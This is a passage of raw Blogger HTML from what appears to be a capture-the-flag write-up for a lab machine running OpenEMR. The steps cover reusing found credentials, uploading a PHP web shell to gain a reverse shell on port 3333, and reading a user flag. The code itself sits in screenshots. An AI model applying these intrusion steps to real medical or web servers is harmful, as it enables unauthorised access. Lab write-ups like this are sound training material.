/&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg39ipEN4DHDev1cefa3GlQX1fTaCoQ35edRjBUjQpNgeuEzvgoPr9LJL1hXCKsixTNjI7e4utFp5IlHl1TahNLeGsXtOhZn6b8fwzwoi_ggt0SSCZkF2HLFTO4W4uDbOeKe1q43q4Ou37t0j3nTUPd_vzWdX5BLk0qH_YNVo5sFBmmrXbZZoHNReFQ5A&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;95&quot; data-original-width=&quot;846&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg39ipEN4DHDev1cefa3GlQX1fTaCoQ35edRjBUjQpNgeuEzvgoPr9LJL1hXCKsixTNjI7e4utFp5IlHl1TahNLeGsXtOhZn6b8fwzwoi_ggt0SSCZkF2HLFTO4W4uDbOeKe1q43q4Ou37t0j3nTUPd_vzWdX5BLk0qH_YNVo5sFBmmrXbZZoHNReFQ5A=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So finally we have credentials &lt;b&gt;admin:ackbar&lt;/b&gt; and &lt;b&gt;medical:medical&lt;/b&gt;.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Logging into Openemr as user &lt;b&gt;admin&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEigQC8LXPWZQFBBqi09vWkM_7UMqfOfWPDYK8EPbIvznbs0WY2pkjFODzWlG3K2Pa3ilzRPcjVFH86fHaoNowNBiUHMGdFXHDd4dMG0hvhuWnSe0w8AUW-nMGBWQ3ushu-Y8P-O9-0YVtXvaFhxUVGmZ1cKzh_4UoB7v1ZXnGD9H0STQaWhrpChqwPjZA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;231&quot; data-original-width=&quot;562&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEigQC8LXPWZQFBBqi09vWkM_7UMqfOfWPDYK8EPbIvznbs0WY2pkjFODzWlG3K2Pa3ilzRPcjVFH86fHaoNowNBiUHMGdFXHDd4dMG0hvhuWnSe0w8AUW-nMGBWQ3ushu-Y8P-O9-0YVtXvaFhxUVGmZ1cKzh_4UoB7v1ZXnGD9H0STQaWhrpChqwPjZA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- There is a management interface for user&lt;b&gt; admin&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgV360vQPg__lf6YPZLeyv95dGUXtKGWKQNBWvpFYH4gr5oKn3GGqNu6yxhk9NEqTRZBA3YKb-l2k5NmaloiMgRZUipYXYBke8g7f1jnWkDfz4M8SvEsHn-ONtIf6IsR4c59pa1t_0xyBevshRknZigHnc4esw2p_bUKkJD0ULw0pxXo9QMHxoLQjGtzQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;307&quot; data-original-width=&quot;685&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgV360vQPg__lf6YPZLeyv95dGUXtKGWKQNBWvpFYH4gr5oKn3GGqNu6yxhk9NEqTRZBA3YKb-l2k5NmaloiMgRZUipYXYBke8g7f1jnWkDfz4M8SvEsHn-ONtIf6IsR4c59pa1t_0xyBevshRknZigHnc4esw2p_bUKkJD0ULw0pxXo9QMHxoLQjGtzQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Files at website are stored at &lt;b&gt;/var/www/html/openemr/sites/default&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjOFqMSB-hMKbMuUoqKV0FXAfYoI0M3fkxbpS9rsN9RcTsldNeEsjywXB8hYsCH5lg2mdk4IZezFnCxUgreOnm1-OcCuV5YZsCtkZPEChsYPVyfWRbPV7tQVzU1hrX61r3hEU_ghNIKKRlSBT2nuT6x5Y4Yg2qjiZqj957lMkQwvYtRfpRtVlTiyA_fMA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;657&quot; data-original-width=&quot;732&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjOFqMSB-hMKbMuUoqKV0FXAfYoI0M3fkxbpS9rsN9RcTsldNeEsjywXB8hYsCH5lg2mdk4IZezFnCxUgreOnm1-OcCuV5YZsCtkZPEChsYPVyfWRbPV7tQVzU1hrX61r3hEU_ghNIKKRlSBT2nuT6x5Y4Yg2qjiZqj957lMkQwvYtRfpRtVlTiyA_fMA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Let&#39;s create an exploit named&lt;b&gt; myshell.php&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiZ1GS0kbeSnRgL5tGuQIkUAT3yTrNTEV6r8hODKmrbNCwuWlt9Hd1eCehMBtFDWPonboT5toHBhVAVfBhcun-mo271GQxe1nnZdLk60DBF27SCFZ1Dq7gzZv0stZBqjhPpHhJxn1QuDmP3QmZydb-7y4yePcz2taLG8t3C5mTJgfqpGhZcJjKBYbx3Kw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;51&quot; data-original-width=&quot;1239&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiZ1GS0kbeSnRgL5tGuQIkUAT3yTrNTEV6r8hODKmrbNCwuWlt9Hd1eCehMBtFDWPonboT5toHBhVAVfBhcun-mo271GQxe1nnZdLk60DBF27SCFZ1Dq7gzZv0stZBqjhPpHhJxn1QuDmP3QmZydb-7y4yePcz2taLG8t3C5mTJgfqpGhZcJjKBYbx3Kw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Uploading&amp;nbsp;&lt;b&gt;myshell.php&lt;/b&gt; to&amp;nbsp;&lt;b&gt;/var/www/html/openemr/sites/default&amp;nbsp;&lt;/b&gt;it&#39;s not allowed:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg7AYdSDvz21DORlGhGiWGW-59KmGeqzCKc7Px9aN3hpRwKxh1FUdZl7HhUCmmtMns7FcZUK1v3Ma5RzZd_orAsLoPaDGXeSrln-zQM971m2CifA_3PtMNY9Ea1IRORIWq1Cm6_icmOB5gMSa3hCWe8dw8AZrew1dMrJz0nVoAjidC6WUjdUq95JdnjpQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;302&quot; data-original-width=&quot;792&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg7AYdSDvz21DORlGhGiWGW-59KmGeqzCKc7Px9aN3hpRwKxh1FUdZl7HhUCmmtMns7FcZUK1v3Ma5RzZd_orAsLoPaDGXeSrln-zQM971m2CifA_3PtMNY9Ea1IRORIWq1Cm6_icmOB5gMSa3hCWe8dw8AZrew1dMrJz0nVoAjidC6WUjdUq95JdnjpQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhRpO98NLoYLwnpYXeb_lvPPwS7HgucgZDhpykeafbEyKV0bTcWUhb98wfM3QkhKMb5an5GWtMMfuPKdDRyFk-Aewuo39a-f0uT52-WMS10A7y1VvWh2EHON95cpO6ygdkw-sfvpPg6FRwN7152WW-cHSYdb0Ky-Lej0dJ_R6iYztV4p-cibV6LcGL9nA&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;142&quot; data-original-width=&quot;498&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhRpO98NLoYLwnpYXeb_lvPPwS7HgucgZDhpykeafbEyKV0bTcWUhb98wfM3QkhKMb5an5GWtMMfuPKdDRyFk-Aewuo39a-f0uT52-WMS10A7y1VvWh2EHON95cpO6ygdkw-sfvpPg6FRwN7152WW-cHSYdb0Ky-Lej0dJ_R6iYztV4p-cibV6LcGL9nA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- However it is feasible to upload &lt;b&gt;myshell.php&lt;/b&gt; to&amp;nbsp;&lt;b&gt;/openemr&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEicnLepqXO1ONXsu02jpbK7HDMHpWh-Ag0rNXrg8Sawge5kGAjLSs5wPcxr1ptpB-nPndyvC0_98kLNvycp5QF44YceLlCe6dz8__3Kog0Mey1YU-ByYKacAQnl6g1gynqVdh8aFkUKMy81-GR3AwtxxcF1x9lsBVXfSK_eCZVl00QqkKZK3WnzWE_x3w&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;233&quot; data-original-width=&quot;647&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEicnLepqXO1ONXsu02jpbK7HDMHpWh-Ag0rNXrg8Sawge5kGAjLSs5wPcxr1ptpB-nPndyvC0_98kLNvycp5QF44YceLlCe6dz8__3Kog0Mey1YU-ByYKacAQnl6g1gynqVdh8aFkUKMy81-GR3AwtxxcF1x9lsBVXfSK_eCZVl00QqkKZK3WnzWE_x3w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting a listening session at port 3333:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhjso3n7pePBkCw8Gkw1QtxlDBN2Xqf7-rV8CPVgJGxxoGOseWOsXt87qYqCw-dyG01Pc1PdiTvE04NrY5dLUXK_Jbh1Pg5S0T-g9dEv_eHuUGSZmlG3qexGPGEsXUOqszCm-wpjuANXy6-pwyJubnP6oGo2Glov94azgnmS88IVbyML_BMnVZv2vHHkw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;72&quot; data-original-width=&quot;357&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhjso3n7pePBkCw8Gkw1QtxlDBN2Xqf7-rV8CPVgJGxxoGOseWOsXt87qYqCw-dyG01Pc1PdiTvE04NrY5dLUXK_Jbh1Pg5S0T-g9dEv_eHuUGSZmlG3qexGPGEsXUOqszCm-wpjuANXy6-pwyJubnP6oGo2Glov94azgnmS88IVbyML_BMnVZv2vHHkw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now, just calling &lt;b&gt;myshell.php&lt;/b&gt; with &lt;b&gt;curl&lt;/b&gt; we have a remote shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjCJHzG_0MF8M7zZqcdWjXtYltcESS67ryAMZ0gFcBlRVRXvIdZf9p7vFm4340SOeaxJ6b9-utrleAwkWYSviRb5dtFiJI8O8gtxz2hmT_MDsod3GmKAPy8LBKp14ZBaZwfh53_xk9XTfz647C4LCwEETQz7o4dIChxpBAYjZVqdNhQ1FvDlYIx7lDtUA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;51&quot; data-original-width=&quot;546&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjCJHzG_0MF8M7zZqcdWjXtYltcESS67ryAMZ0gFcBlRVRXvIdZf9p7vFm4340SOeaxJ6b9-utrleAwkWYSviRb5dtFiJI8O8gtxz2hmT_MDsod3GmKAPy8LBKp14ZBaZwfh53_xk9XTfz647C4LCwEETQz7o4dIChxpBAYjZVqdNhQ1FvDlYIx7lDtUA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjAuN32r9Clp_QMJqe_jKO0zmSV2-K3UVOEG5213_e-mZU2MCFHHcDs9R2vU8YeU5Xsp2ovet7_gQCgpwYPpIGQ1DJPlBn7c8YqcBtQG3h40ssz66SHISu5VrWq8mh-P8HcJjmO1WgdCENG_WnAECFobx65VnDhFlndXBdKguWwIYNnexbDekzuLz7OKQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;188&quot; data-original-width=&quot;776&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjAuN32r9Clp_QMJqe_jKO0zmSV2-K3UVOEG5213_e-mZU2MCFHHcDs9R2vU8YeU5Xsp2ovet7_gQCgpwYPpIGQ1DJPlBn7c8YqcBtQG3h40ssz66SHISu5VrWq8mh-P8HcJjmO1WgdCENG_WnAECFobx65VnDhFlndXBdKguWwIYNnexbDekzuLz7OKQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - CAPTURING THE 1st FLAG&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing the &lt;b&gt;/home&lt;/b&gt; folder we find an additional user called &lt;b&gt;almirant&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiOiud8XnAxvxJyo2NfNmKMrK-w7WeezxXakBvXZYMwHJZjz6ridRbJtoefBurRqV71fdFMuA0JroH-TI5pHro21f4RCvn36jU10K_LUTBsGkK6_sVR5_rlThY-s-BcnMdJ428tFbMHCA0Uvmn6_AUwWkk1zwt8VjTV-wm3hh1ph7VlwxgD4lo--LkvaQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;230&quot; data-original-width=&quot;658&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiOiud8XnAxvxJyo2NfNmKMrK-w7WeezxXakBvXZYMwHJZjz6ridRbJtoefBurRqV71fdFMuA0JroH-TI5pHro21f4RCvn36jU10K_LUTBsGkK6_sVR5_rlThY-s-BcnMdJ428tFbMHCA0Uvmn6_AUwWkk1zwt8VjTV-wm3hh1ph7VlwxgD4lo--LkvaQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Inside &lt;b&gt;almirant&lt;/b&gt;&#39;s home folder we find &lt;b&gt;user.txt&lt;/b&gt; and the 1st flag:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjAobKD9F7OUI5uzyGDU9VUIAfz4cRh7dPbJ3wpyEktQuiW-VdXbJVu7LnbKs_TGvtORR6FH2T2eDseXXx8h1Z0I6eTzjIHW0hXLL0JzJanwKGVCAaUZgo9Dlxcv3VMAltx1N8HD6mq6OA2ZLZxOQc8c9EtMpxnRWWefELBlYuWIH2y7t2SDl_X5ti6Ug&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;308&quot; data-original-width=&quot;736&quot; 